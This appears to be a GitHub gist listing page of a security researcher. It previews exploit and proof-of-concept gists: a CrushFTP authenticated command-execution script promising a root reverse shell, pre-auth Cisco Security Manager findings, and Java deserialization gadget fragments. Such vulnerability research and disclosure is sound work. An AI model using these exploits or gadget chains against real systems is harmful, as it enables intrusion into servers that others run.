Skip to content

Instantly share code, notes, and snippets.

Avatar

Frycos Frycos

  • Germany
View GitHub Profile
View crushftp_exploit.py
#!/usr/bin/env python3
"""
Author: @frycos
Authenticated Remote Command Execution in all CrushFTP versions
User account has to be admin or needs job creation permissions
Should give you a root reverse shell in most cases
Vendor website: https://crushftp.com/
View CSM_pocs.md

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.

View URLDNSequals.java
/* ysoserial URLDNS gadget
* but this time with equals() trampoline
* hashcode is not set to -1
* author: @frycos
*/
static void buildDNSGadget(String url) throws Exception {
URLStreamHandler handler = new SilentURLStreamHandler();
URL u = new URL(null, url, handler);
View PartItemGadget.java
/*
* author: @frycos
* heavily inspired by ysoserial FileUpload gadget
*
* Don't forget needed imports:
* import org.apache.catalina.connector.Request,
* import org.apache.catalina.fileupload.Multipart,
* and e.g. import org.glassfish.grizzly.servlet.WebappContext
*
* only applicable for non-default classpaths (but seen "in the wild") including Glassfish's web-core.jar
View CheckTypedDeserialization.cs
using System;
using System.Collections.Generic;
using System.Configuration;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.Serialization.Formatters;
using System.Runtime.Serialization.Formatters.Binary;
namespace CheckTypedDeser